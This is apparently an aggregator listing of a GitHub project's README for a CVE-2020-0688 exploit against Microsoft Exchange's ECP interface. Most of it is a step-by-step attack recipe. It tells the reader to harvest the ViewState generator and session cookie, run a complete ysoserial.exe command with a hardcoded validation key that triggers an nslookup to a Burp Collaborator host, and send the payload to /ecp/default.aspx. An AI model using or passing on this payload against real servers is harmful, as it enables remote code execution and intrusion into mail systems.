random-robbie / Cve 2020 0688
cve-2020-0688
Stars: ✭ 152
Programming Languages
python
139335 projects - #7 most used programming language
cve-2020-0688
cve-2020-0688
Login with a user with an email address privliage is nothing to worry about.
Grab - __VIEWSTATEGENERATOR
from page source
Grab - the value of ASP.NET_SessionId
cookie for viewstateuserkey value
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
GET TO:
https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>
The Exploit.py is untested and need a demo system to fire up and play with.
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].